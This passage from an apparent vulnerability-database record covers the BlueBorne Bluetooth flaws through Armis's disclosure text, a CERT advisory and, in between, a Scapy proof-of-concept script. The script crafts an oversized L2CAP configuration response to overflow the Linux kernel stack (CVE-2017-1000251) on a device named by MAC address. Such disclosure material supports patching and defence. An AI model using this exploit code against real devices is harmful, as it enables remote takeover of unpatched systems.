Second, it allows the attack to bypass current security measures and remain undetected, as traditional methods do not protect from airborne threats. Airborne attacks can also allow hackers to penetrate secure internal networks which are \u201cair gapped,\u201d meaning they are disconnected from any other network for protection. This can endanger industrial systems, government agencies, and critical infrastructure.\r\n\r\nFinally, unlike traditional malware or attacks, the user does not have to click on a link or download a questionable file. No action by the user is necessary to enable the attack\r\n\r\n#### A comprehensive and severe threat\r\nThe BlueBorne attack vector requires no user interaction, is compatible to all software versions, and does not require any preconditions or configurations aside of the Bluetooth being active. Unlike the common misconception, Bluetooth enabled devices are constantly searching for incoming connections from any devices, and not only those they have been paired with. This means a Bluetooth connection can be established without pairing the devices at all. This makes BlueBorne one of the most broad potential attacks found in recent years, and allows an attacker to strike completely undetected.\r\n\r\n#### Next generation Bluetooth vulnerabilities\r\nIn the past, most Bluetooth vulnerabilities and security flaws originated in issues with the protocol itself, which were resolved in version 2.1 in 2007. Nearly all vulnerabilities found since were of low severity, and did not allow remote code execution. This transition occurred as the research community turned its eyes elsewhere, and did not scrutinize the implementations of the Bluetooth protocol in the different platforms, as it did with other major protocols.\r\n\r\nBluetooth is a difficult protocol to implement, which makes it prone to two kinds of vulnerabilities. 
On the one hand, vendors are likely to follow the protocol\u2019s implementation guidelines word-for-word, which means that when a vulnerability is found in one platform it might affect others. These mirrored vulnerabilities happened with CVE-2017-8628 and CVE-2017-0783 (Windows & Android MiTM) which are \u201cidentical twins\u201d. On the other hand, in some areas the Bluetooth specifications leave too much room for interpretation, causing fragmented methods of implementation in the various platforms, making each of them more likely to contain a vulnerability of its own.\r\n\r\nThis is why the vulnerabilities which comprise BlueBorne are based on the various implementations of the Bluetooth protocol, and are more prevalent and severe than those of recent years. We are concerned that the vulnerabilities we found are only the tip of the iceberg, and that the distinct implementations of the protocol on other platforms may contain additional vulnerabilities.\r\n\r\n#### A Coordinated Disclosure\r\nArmis reached out to the following actors to ensure a safe, secure, and coordinated response to the vulnerabilities identified.\r\n\r\nGoogle \u2013 Contacted on April 19, 2017, after which details were shared. Released public security update and security bulletin on September 4th, 2017. Coordinated disclosure on September 12th, 2017.\r\nMicrosoft \u2013 Contacted on April 19, 2017 after which details were shared. Updates were made on July 11. Public disclosure on September 12, 2017 as part of coordinated disclosure.\r\nApple \u2013 Contacted on August 9, 2017. Apple had no vulnerability in its current versions.\r\nSamsung \u2013 Contact on three separate occasions in April, May, and June. No response was received back from any outreach.\r\nLinux \u2013 Contacted August 15 and 17, 2017. 
On September 5, 2017, we connected and provided the necessary information to the the Linux kernel security team and to the Linux distributions security contact list and conversations followed from there. Targeting updates for on or about September 12, 2017 for coordinated disclosure.\r\n\r\n### Affected Devices\r\n\r\n#### The threat posed by the vulnerabilities Armis disclosed\r\nThe vulnerabilities disclosed by Armis affect all devices running on Android, Linux, Windows, and pre-version 10 of iOS operating systems, regardless of the Bluetooth version in use. This means almost every computer, mobile device, smart TV or other IoT device running on one of these operating systems is endangered by at least one of the eight vulnerabilities. This covers a significant portion of all connected devices globally.\r\n\r\n#### What Devices Are Affected?\r\n##### Android\r\nAll Android phones, tablets, and wearables (except those using only Bluetooth Low Energy) of all versions are affected by four vulnerabilities found in the Android operating system, two of which allow remote code execution (CVE-2017-0781 and CVE-2017-0782), one results in information leak (CVE-2017-0785) and the last allows an attacker to perform a Man-in-The-Middle attack (CVE-2017-0783).\r\n\r\nExamples of impacted devices:\r\n\r\n* Google Pixel\r\n* Samsung Galaxy\r\n* Samsung Galaxy Tab\r\n* LG Watch Sport\r\n* Pumpkin Car Audio System\r\n\r\nGoogle has issued a patch and notified its partners. It will be available for:\r\n\r\n* Nougat (7.0)\r\n* Marshmallow (6.0)\r\n\r\n\r\nGoogle has issued a security update patch and notified its partners. It was available to Android partners on August 7th, 2017, and made available as part of the September Security Update and Bulletin. We recommend that users check that Bulletin for the latest most accurate information. 
Android users should verify that they have the September 9, 2017 Security Patch Level,\r\n\r\nNote to Android users: To check if your device is risk or is the devices around you are at risk, download the Armis BlueBorne Scanner App on Google Play.\r\n\r\n##### Windows\r\n\r\nAll Windows computers since Windows Vista are affected by the \u201cBluetooth Pineapple\u201d vulnerability which allows an attacker to perform a Man-in-The-Middle attack (CVE-2017-8628).\r\n\r\nMicrosoft is issuing security patches to all supported Windows versions at 10 AM, Tuesday, September 12. We recommend that Windows users should check with the Microsoft release here for the latest information.\r\n\r\n##### Linux\r\nLinux is the underlying operating system for a wide range of devices. The most commercial, and consumer-oriented platform based on Linux is the Tizen OS.\r\n\r\n* All Linux devices running BlueZ are affected by the information leak vulnerability (CVE-2017-1000250).\r\n* All Linux devices from version 3.3-rc1 (released in October 2011) are affected by the remote code execution vulnerability (CVE-2017-1000251).\r\n\r\nExamples of impacted devices:\r\n\r\n* Samsung Gear S3 (Smartwatch)\r\n* Samsung Smart TVs\r\n* Samsung Family Hub (Smart refrigerator)\r\n\r\nInformation on Linux updates will be provided as soon as they are live.\r\n\r\n##### iOS\r\nAll iPhone, iPad and iPod touch devices with iOS 9.3.5 and lower, and AppleTV devices with version 7.2.2 and lower are affected by the remote code execution vulnerability. This vulnerability was already mitigated by Apple in iOS 10, so no new patch is needed to mitigate it. 
We recommend you upgrade to the latest iOS or tvOS available.\r\n\r\nIf you are concerned that your device may not be patched, we recommend disabling Bluetooth, and minimizing its use until you can confirm a patch is issued and installed on your device.\r\n\r\n### Technical Overview\r\n\r\n#### BlueBorne Explained: How The Attack Vector Works\r\n\r\nThe BlueBorne attack vector has several stages. First, the attacker locates active Bluetooth connections around him or her. Devices can be identified even if they are not set to \u201cdiscoverable\u201d mode. Next, the attacker obtains the device\u2019s MAC address, which is a unique identifier of that specific device. By probing the device, the attacker can determine which operating system his victim is using, and adjust his exploit accordingly. The attacker will then exploit a vulnerability in the implementation of the Bluetooth protocol in the relevant platform and gain the access he needs to act on his malicious objective. At this stage the attacker can choose to create a Man-in-The-Middle attack and control the device\u2019s communication, or take full control over the device and use it for a wide array of cybercriminal purposes.\r\n\r\n[Download our Technical White Paper on BlueBorne](http://go.armis.com/blueborne-technical-paper)\r\n\r\n#### BlueBorne attack on Android\r\nOnce the attacker determined his target is using the Android operating system, he can use four of the vulnerabilities disclosed by Armis to exploit the device, or they can use a separate vulnerability to conduct a Man-in-The-Middle attack.\r\n\r\nHere is a quick demo of how BlueBorne can take control of an Android device:\r\nhttps://youtu.be/Az-l90RCns8\r\n\r\n##### Information Leak Vulnerability (CVE-2017-0785)\r\nThe first vulnerability in the Android operating system reveals valuable information which helps the attacker leverage one of the remote code execution vulnerabilities described below. 
The vulnerability was found in the SDP (Service Discovery Protocol) server, which enables the device to identify other Bluetooth services around it. The flaw allows the attacker to send a set of crafted requests to the server, causing it to disclose memory bits in response. These pieces of information can later be used by the attacker to overcome advanced security measures and take control over the device. This vulnerability can also allow an attacker to leak encryption keys from the targeted device and eavesdrop on Bluetooth communications, in an attack that very much resembles heartbleed.\r\n\r\n##### Remote Code Execution Vulnerability #1 (CVE-2017-0781)\r\nThis vulnerability resides in the Bluetooth Network Encapsulation Protocol (BNEP) service, which enables internet sharing over a Bluetooth connection (tethering). Due to a flaw in the BNEP service, a hacker can trigger a surgical memory corruption, which is easy to exploit and enables him to run code on the device, effectively granting him complete control. Due to lack of proper authorization validations, triggering this vulnerability does not require any user interaction, authentication or pairing, so the targeted user is completely unaware of an ongoing attack.\r\n\r\n##### Remote Code Execution vulnerability #2 (CVE-2017-0782)\r\nThis vulnerability is similar to the previous one, but resides in a higher level of the BNEP service \u2013 the Personal Area Networking (PAN) profile \u2013 which is responsible for establishing an IP based network connection between two devices. In this case, the memory corruption is larger, but can still be leveraged by an attacker to gain full control over the infected device. 
Similar to the previous vulnerability, this vulnerability can also be triggered without any user interaction, authentication or pairing.\r\n\r\n##### The Bluetooth Pineapple \u2013 Man in The Middle attack (CVE-2017-0783)\r\nMan-in-The-Middle (MiTM) attacks allow the attacker to intercept and intervene in all data going to or from the targeted device. To create a MiTM attack using Wi-Fi, the attacker requires both special equipment, and a connection request from the targeted device to an open WiFi network. In Bluetooth, the attacker can actively engage his target, using any device with Bluetooth capabilities. The vulnerability resides in the PAN profile of the Bluetooth stack, and enables the attacker to create a malicious network interface on the victim\u2019s device, re-configure IP routing and force the device to transmit all communication through the malicious network interface. This attack does not require any user interaction, authentication or pairing, making it practically invisible.\r\n\r\n#### BlueBorne attack on Windows\r\nWe have disclosed a vulnerability in Windows which allows an attacker to conduct a Man-in-The-Middle attack.\r\n\r\nHere is a quick demo of how BlueBorne can take create a MiTM attack:\r\nhttps://youtu.be/QrHbZPO9Rnc\r\n\r\n##### The Bluetooth Pineapple #2 \u2013 Man in The Middle attack (CVE-2017-8628)\r\n\r\nThis vulnerability is identical to the one found in the Android operating system, and affects both systems since they shared the same principals in implementing some of the Bluetooth protocol. The vulnerability resides in the Bluetooth stack, and enables the attacker to create a malicious network interface on the victim\u2019s device, re-configure IP routing and force the device to transmit all communication through it. 
This attack does not require any user interaction, authentication or pairing, making it also practically invisible.\r\n\r\n#### BlueBorne attack on Linux\r\nArmis has disclosed two vulnerabilities in the Linux operating system which allow attackers to take complete control over infected devices. The first is an information leak vulnerability, which can help the attacker determine the exact version used by the targeted device and adjust his exploit accordingly. The second is a stack overflow with can lead to full control of a device.\r\n\r\nHere is a quick demo of how BlueBorne can take over a Linux device:\r\nhttps://youtu.be/U7mWeKhd_-A\r\n\r\n##### Information leak vulnerability (CVE-2017-1000250)\r\n\r\nSimilar to the information leak vulnerability in Android, this vulnerability resides in the SDP server responsible for identifying other services using Bluetooth around the device. The flaw allows the attacker to send a set of crafted requests to the server, causing it to disclose memory bits in response. This can be used by an attacker to expose sensitive data from the Bluetooth processthat may also contain encryption keys of Bluetooth communications. These can be used by the attacker to initiate an attack that very much resembles heartbleed.\r\n\r\n##### A stack overflow in BlueZ (CVE-2017-1000251)\r\n\r\nThis vulnerability was found in the Bluetooth stack of the Linux Kernel, which is the very core of the operating system. An internal flaw in the L2CAP (Logical Link Control and Adaptation Protocol) that is used to connect between two devices causes a memory corruption. An attacker can use this memory corruption to gain full control of the device.\r\n\r\n#### BlueBorne attack on iOS\r\nThis vulnerability found by Armis was disclosed to Apple. Since it was mitigated in iOS version 10 and Apple TV version above 7.2.2, a full exploit was not developed to demonstrate how this vulnerability can be leveraged for gaining full control of an iOS device. 
However, this vulnerability still poses great risk to any iOS device prior to version 10, as it is does not require any interaction from the users, or configuration of any sort on the targeted device. The vulnerability can be leveraged by an attacker to gain remote code execution in a high-privileged context (the Bluetooth process).\r\n\r\n##### Remote code execution via Apple\u2019s Low Energy Audio Protocol\r\n\r\nThis vulnerability was found in a new protocol Apple has invented, which operates on top of Bluetooth, called LEAP (Low energy audio protocol). The protocol is designed to stream audio to low energy audio peripherals (such as low energy headsets, or the Siri Remote). This enables devices that only have Bluetooth Low Energy to stream audio and send audio commands. Due to a flaw in the implementation of LEAP, a large audio command can be sent to a targeted device and lead to a memory corruption. Since the audio commands sent via LEAP are not properly validated, an attacker can use the memory corruption to gain full control of the device.\r\n\r\n### Securing against BlueBorne\r\n\r\nVulnerabilities that can spread over the air and between devices pose a tremendous threat to any organization or individual. Current security measures, including endpoint protection, mobile data management, firewalls, and network security solution are not designed to identify these type of attacks, and related vulnerabilities and exploits, as their main focus is to block attacks that can spread via IP connections.\r\n\r\nNew solutions are needed to address the new airborne attack vector, especially those that make air gapping irrelevant. Additionally, there will need to be more attention and research as new protocols are using for consumers and businesses alike. With the large number of desktop, mobile, and IoT devices only increasing, it is critical we can ensure these types of vulnerabilities are not exploited. 
This is the primary mission of Armis in this new connected age.", "published": "2017-09-13T00:00:00", "type": "seebug", "title": "The IoT Attack Vector \u201cBlueBorne\u201d Exposes Almost Every Connected Device\n (BlueBorne)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-8628"], "modified": "2017-09-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96467", "id": "SSV:96467", "sourceData": "\n ## 1) Install Scapy ##\r\n\r\n[https://github.com/secdev/scapy](https://github.com/secdev/scapy)\r\n\r\n\r\nAdd/Replace these requests and responses in Bluetooth Protocol stack to these:\r\n\r\n\r\nscapy/layers/bluetooth.py\r\n\r\n\tclass L2CAP_ConfReq(Packet):\r\n\t name = \"L2CAP Conf Req\"\r\n\t fields_desc = [ LEShortField(\"dcid\",0),\r\n\t LEShortField(\"flags\",0),\r\n\t ByteField(\"type\",0),\r\n\t ByteField(\"length\",0),\r\n\t ByteField(\"identifier\",0),\r\n\t ByteField(\"servicetype\",0),\r\n\t LEShortField(\"sdusize\",0),\r\n\t LEIntField(\"sduarrtime\",0),\r\n\t LEIntField(\"accesslat\",0),\r\n\t LEIntField(\"flushtime\",0),\r\n\t ]\r\n\t\r\n\t\r\n\t\r\n\tclass L2CAP_ConfResp(Packet):\r\n\t name = \"L2CAP Conf Resp\"\r\n\t fields_desc = [ LEShortField(\"scid\",0),\r\n\t LEShortField(\"flags\",0),\r\n\t LEShortField(\"result\",0),\r\n\t ByteField(\"type0\",0),\r\n\t ByteField(\"length0\",0),\r\n\t LEShortField(\"option0\",0),\r\n\t ByteField(\"type1\",0),\r\n\t ByteField(\"length1\",0),\r\n\t LEShortField(\"option1\",0),\r\n\t ByteField(\"type2\",0),\r\n\t ByteField(\"length2\",0),\r\n\t LEShortField(\"option2\",0),\r\n\t ByteField(\"type3\",0),\r\n\t ByteField(\"length3\",0),\r\n\t LEShortField(\"option3\",0),\r\n\t ByteField(\"type4\",0),\r\n\t ByteField(\"length4\",0),\r\n\t LEShortField(\"option4\",0),\r\n\t ByteField(\"type5\",0),\r\n\t ByteField(\"length5\",0),\r\n\t LEShortField(\"option5\",0),\r\n\t ByteField(\"type6\",0),\r\n\t 
ByteField(\"length6\",0),\r\n\t LEShortField(\"option6\",0),\r\n\t ByteField(\"type7\",0),\r\n\t ByteField(\"length7\",0),\r\n\t LEShortField(\"option7\",0),\r\n\t ByteField(\"type8\",0),\r\n\t ByteField(\"length8\",0),\r\n\t LEShortField(\"option8\",0),\r\n\t ByteField(\"type9\",0),\r\n\t ByteField(\"length9\",0),\r\n\t LEShortField(\"option9\",0),\r\n\t ByteField(\"type10\",0),\r\n\t ByteField(\"length10\",0),\r\n\t LEShortField(\"option10\",0),\r\n\t ByteField(\"type11\",0),\r\n\t ByteField(\"length11\",0),\r\n\t LEShortField(\"option11\",0),\r\n\t ByteField(\"type12\",0),\r\n\t ByteField(\"length12\",0),\r\n\t LEShortField(\"option12\",0),\r\n\t ByteField(\"type13\",0),\r\n\t ByteField(\"length13\",0),\r\n\t LEShortField(\"option13\",0),\r\n\t ByteField(\"type14\",0),\r\n\t ByteField(\"length14\",0),\r\n\t LEShortField(\"option14\",0),\r\n\t ByteField(\"type15\",0),\r\n\t ByteField(\"length15\",0),\r\n\t LEShortField(\"option15\",0),\r\n\t ByteField(\"type16\",0),\r\n\t ByteField(\"length16\",0),\r\n\t LEShortField(\"option16\",0),\r\n\t ByteField(\"type17\",0),\r\n\t ByteField(\"length17\",0),\r\n\t LEShortField(\"option17\",0),\r\n\t ByteField(\"type18\",0),\r\n\t ByteField(\"length18\",0),\r\n\t LEShortField(\"option18\",0),\r\n\t ByteField(\"type19\",0),\r\n\t ByteField(\"length19\",0),\r\n\t LEShortField(\"option19\",0),\r\n\t ByteField(\"type20\",0),\r\n\t ByteField(\"length20\",0),\r\n\t LEShortField(\"option20\",0),\r\n\t ByteField(\"type21\",0),\r\n\t ByteField(\"length21\",0),\r\n\t LEShortField(\"option21\",0),\r\n\t ByteField(\"type22\",0),\r\n\t ByteField(\"length22\",0),\r\n\t LEShortField(\"option22\",0),\r\n\t ByteField(\"type23\",0),\r\n\t ByteField(\"length23\",0),\r\n\t LEShortField(\"option23\",0),\r\n\t ByteField(\"type24\",0),\r\n\t ByteField(\"length24\",0),\r\n\t LEShortField(\"option24\",0),\r\n\t ByteField(\"type25\",0),\r\n\t ByteField(\"length25\",0),\r\n\t LEShortField(\"option25\",0),\r\n\t ByteField(\"type26\",0),\r\n\t 
ByteField(\"length26\",0),\r\n\t LEShortField(\"option26\",0),\r\n\t ByteField(\"type27\",0),\r\n\t ByteField(\"length27\",0),\r\n\t LEShortField(\"option27\",0),\r\n\t ByteField(\"type28\",0),\r\n\t ByteField(\"length28\",0),\r\n\t LEShortField(\"option28\",0),\r\n\t ByteField(\"type29\",0),\r\n\t ByteField(\"length29\",0),\r\n\t LEShortField(\"option29\",0),\r\n\t ByteField(\"type30\",0),\r\n\t ByteField(\"length30\",0),\r\n\t LEShortField(\"option30\",0),\r\n\t ByteField(\"type31\",0),\r\n\t ByteField(\"length31\",0),\r\n\t LEShortField(\"option31\",0),\r\n\t ByteField(\"type32\",0),\r\n\t ByteField(\"length32\",0),\r\n\t LEShortField(\"option32\",0),\r\n\t ByteField(\"type33\",0),\r\n\t ByteField(\"length33\",0),\r\n\t LEShortField(\"option33\",0),\r\n\t ByteField(\"type34\",0),\r\n\t ByteField(\"length34\",0),\r\n\t LEShortField(\"option34\",0),\r\n\t ByteField(\"type35\",0),\r\n\t ByteField(\"length35\",0),\r\n\t LEShortField(\"option35\",0),\r\n\t ByteField(\"type36\",0),\r\n\t ByteField(\"length36\",0),\r\n\t LEShortField(\"option36\",0),\r\n\t ByteField(\"type37\",0),\r\n\t ByteField(\"length37\",0),\r\n\t LEShortField(\"option37\",0),\r\n\t ByteField(\"type38\",0),\r\n\t ByteField(\"length38\",0),\r\n\t LEShortField(\"option38\",0),\r\n\t ByteField(\"type39\",0),\r\n\t ByteField(\"length39\",0),\r\n\t LEShortField(\"option39\",0),\r\n\t ByteField(\"type40\",0),\r\n\t ByteField(\"length40\",0),\r\n\t LEShortField(\"option40\",0),\r\n\t ByteField(\"type41\",0),\r\n\t ByteField(\"length41\",0),\r\n\t LEShortField(\"option41\",0),\r\n\t ByteField(\"type42\",0),\r\n\t ByteField(\"length42\",0),\r\n\t LEShortField(\"option42\",0),\r\n\t ByteField(\"type43\",0),\r\n\t ByteField(\"length43\",0),\r\n\t LEShortField(\"option43\",0),\r\n\t ByteField(\"type44\",0),\r\n\t ByteField(\"length44\",0),\r\n\t LEShortField(\"option44\",0),\r\n\t ByteField(\"type45\",0),\r\n\t ByteField(\"length45\",0),\r\n\t LEShortField(\"option45\",0),\r\n\t ByteField(\"type46\",0),\r\n\t 
ByteField(\"length46\",0),\r\n\t LEShortField(\"option46\",0),\r\n\t ByteField(\"type47\",0),\r\n\t ByteField(\"length47\",0),\r\n\t LEShortField(\"option47\",0),\r\n\t ByteField(\"type48\",0),\r\n\t ByteField(\"length48\",0),\r\n\t LEShortField(\"option48\",0),\r\n\t ByteField(\"type49\",0),\r\n\t ByteField(\"length49\",0),\r\n\t LEShortField(\"option49\",0),\r\n\t ByteField(\"type50\",0),\r\n\t ByteField(\"length50\",0),\r\n\t LEShortField(\"option50\",0),\r\n\t ByteField(\"type51\",0),\r\n\t ByteField(\"length51\",0),\r\n\t LEShortField(\"option51\",0),\r\n\t ByteField(\"type52\",0),\r\n\t ByteField(\"length52\",0),\r\n\t LEShortField(\"option52\",0),\r\n\t ByteField(\"type53\",0),\r\n\t ByteField(\"length53\",0),\r\n\t LEShortField(\"option53\",0),\r\n\t ByteField(\"type54\",0),\r\n\t ByteField(\"length54\",0),\r\n\t LEShortField(\"option54\",0),\r\n\t ByteField(\"type55\",0),\r\n\t ByteField(\"length55\",0),\r\n\t LEShortField(\"option55\",0),\r\n\t ByteField(\"type56\",0),\r\n\t ByteField(\"length56\",0),\r\n\t LEShortField(\"option56\",0),\r\n\t ByteField(\"type57\",0),\r\n\t ByteField(\"length57\",0),\r\n\t LEShortField(\"option57\",0),\r\n\t ByteField(\"type58\",0),\r\n\t ByteField(\"length58\",0),\r\n\t LEShortField(\"option58\",0),\r\n\t ByteField(\"type59\",0),\r\n\t ByteField(\"length59\",0),\r\n\t LEShortField(\"option59\",0),\r\n\t ByteField(\"type60\",0),\r\n\t ByteField(\"length60\",0),\r\n\t LEShortField(\"option60\",0),\r\n\t ByteField(\"type61\",0),\r\n\t ByteField(\"length61\",0),\r\n\t LEShortField(\"option61\",0),\r\n\t ByteField(\"type62\",0),\r\n\t ByteField(\"length62\",0),\r\n\t LEShortField(\"option62\",0),\r\n\t ByteField(\"type63\",0),\r\n\t ByteField(\"length63\",0),\r\n\t LEShortField(\"option63\",0),\r\n\t ByteField(\"type64\",0),\r\n\t ByteField(\"length64\",0),\r\n\t LEShortField(\"option64\",0),\r\n\t ByteField(\"type65\",0),\r\n\t ByteField(\"length65\",0),\r\n\t LEShortField(\"option65\",0),\r\n\t ByteField(\"type66\",0),\r\n\t 
ByteField(\"length66\",0),\r\n\t LEShortField(\"option66\",0),\r\n\t ByteField(\"type67\",0),\r\n\t ByteField(\"length67\",0),\r\n\t LEShortField(\"option67\",0),\r\n\t ByteField(\"type68\",0),\r\n\t ByteField(\"length68\",0),\r\n\t LEShortField(\"option68\",0),\r\n\t ByteField(\"type69\",0),\r\n\t ByteField(\"length69\",0),\r\n\t LEShortField(\"option69\",0),\r\n\t ]\r\n\t\r\n\r\n## 2) Exploit ##\r\n\r\n\r\nbluebornexploit.py\r\n------------------------\r\n\t\r\n\tfrom scapy.all import *\r\n\t\r\n\tpkt = L2CAP_CmdHdr(code=4)/\r\n\tL2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)\r\n\t\r\n\t\r\n\tpkt1 = L2CAP_CmdHdr(code=5)/\r\n\tL2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,leng
th37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)\r\n\t\r\n\t\r\n\tbt = BluetoothL2CAPSocket(\"00:1A:7D:DA:71:13\")\r\n\t\r\n\tbt.send(pkt)\r\n\tbt.send(pkt1)\r\n\t\r\n\r\nbluetoothsrv.py\r\n--------------------\r\n\r\n\tfrom scapy.all import *\r\n\t\r\n\tbt = BluetoothL2CAPSocket(\"01:02:03:04:05:06\")\r\n\t\r\n\tbt.recv()\n ", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96467"}], "cert": [{"lastseen": "2020-09-18T20:41:35", "bulletinFamily": "info", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-14315", "CVE-2017-8628"], "description": "### Overview \n\nA collection of Bluetooth implementation vulnerabilities known as \"BlueBorne\" has been released. 
These vulnerabilities collectively affect Windows, iOS, and Linux-kernel-based operating systems including Android and Tizen, and may in the worst case allow an unauthenticated attacker to perform commands on the device.\n\n### Description \n\nThe following vulnerabilities have been identified in various Bluetooth implementations:\n\n1\\. [**CWE-120**](<http://cwe.mitre.org/data/definitions/120.html>)**: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')** \\- CVE-2017-1000251 \n \nLinux kernel versions from 3.3-rc1 to present contain a vulnerable implementation of L2CAP EFS within the BlueZ module. The l2cap_parse_conf_rsp function does not properly check the length of the rsp argument prior to unpacking, allowing an attacker to overflow a 64 byte buffer on the kernel stack with an unlimited amount of data crafted to conform to a valid L2CAP response. \n \n2\\. [**CWE-125**](<http://cwe.mitre.org/data/definitions/125.html>)**: Out-of-bounds Read** \\- CVE-2017-1000250 \n \nAll versions of BlueZ for Linux contain a vulnerable implementation of SDP. An attacker may be able to control the continuation state within SDP request packets and cause the SDP server to return an out of bounds read from the response buffer. \n \n3\\. [**CWE-125**](<http://cwe.mitre.org/data/definitions/125.html>)**: Out-of-bounds Read** \\- CVE-2017-0785 \n \nAll versions of Android prior to September 9, 2017 Security Patch level contain a vulnerable implementation of SDP within the Android Bluetooth software stack. An attacker may be able to control the continuation state within SDP request packets and cause the SDP server to return an out of bounds read from the response buffer. While a similar flaw to CVE-2017-1000250, this is a distinct vulnerability in a different software stack. \n \n4\\. 
[**CWE-122**](<http://cwe.mitre.org/data/definitions/122.html>)**: Heap-based Buffer Overflow** \\- CVE-2017-0781 \n \nIn all versions of Android prior to September 9, 2017 Security Patch level, an incorrect buffer size passed to a memcpy call within the BNEP implementation for Android may allow an attacker to send crafted packets to the device that overflow the heap. \n \n5\\. [**CWE-191**](<http://cwe.mitre.org/data/definitions/191.html>)**: Integer Underflow (Wrap or Wraparound)** \\- CVE-2017-0782 \n \nIn all versions of Android prior to September 9, 2017 Security Patch level, the bnep_process_control_packet function of the BNEP implementation for Android does not properly check the size of rem_len before decrementing, allowing integer underflow and further unsafe processing of attacker-controlled packets. \n \n6\\. [**CWE-122**](<http://cwe.mitre.org/data/definitions/122.html>)**: Heap-based Buffer Overflow**\\- CVE-2017-14315 \n \nApple's Bluetooth Low-Energy Audio Protocol (LEAP) implementation in iOS version 9.3.5 and lower, and AppleTV tvOS version 7.2.2 and lower, does not properly validate the CID for incoming Bluetooth LEAP audio data, which may result in a heap overflow by not properly validating packet size before calling memcpy. An attacker sending \"classic\" (non-low-energy) Bluetooth packets may be able to cause multiple heap overflows resulting in code execution with the Bluetooth stack context. \n \n7 and 8. [**CWE-300**](<http://cwe.mitre.org/data/definitions/300.html>)**: Channel Accessible by Non-Endpoint ('Man-in-the-Middle')** \\- CVE-2017-0783 and CVE-2017-8628 \n \nIncorrect \"Security Level\" requirements in the PAN profile of the Bluetooth implementation may allow an attacker to gain permissions to perform man in the middle attacks on the user. 
CVE-2017-0783 applies to all versions of Android prior to the September 9, 2017, Security Patch Level, while CVE-2017-8628 applies to a similar flaw in all versions of Windows from Windows Vista to Windows 10. \n \nFor more details, please read [Armis's BlueBorne disclosure website](<https://www.armis.com/blueborne/#/technical>) and Technical White Paper. \n \n--- \n \n### Impact \n\nAn unauthenticated, remote attacker may be able to obtain private information about the device or user, or execute arbitrary code on the device. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nPatches are available in the latest releases of Windows (see [Microsoft bulletin](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), iOS, the Linux kernel, and Android (see [September 2017 security bulletin](<https://source.android.com/security/bulletin/2017-09-01>)). \n \nCheck with your device manufacturer to determine if firmware updates will be available. \n \nPhones and other mobile devices in the US running Android are likely to see delayed updates, or possibly never receive updates, due to the complexity of the US mobile ecosystem which typically requires manufacturer and carrier support to push updates. \n \nIf an update is not available, affected users should consider the following workaround \n \n--- \n \n**Disable Bluetooth on your device** \n \nAffected users should consider disabling Bluetooth on affected devices if Bluetooth is unused or unnecessary. \n \n--- \n \n### Vendor Information\n\n240311\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
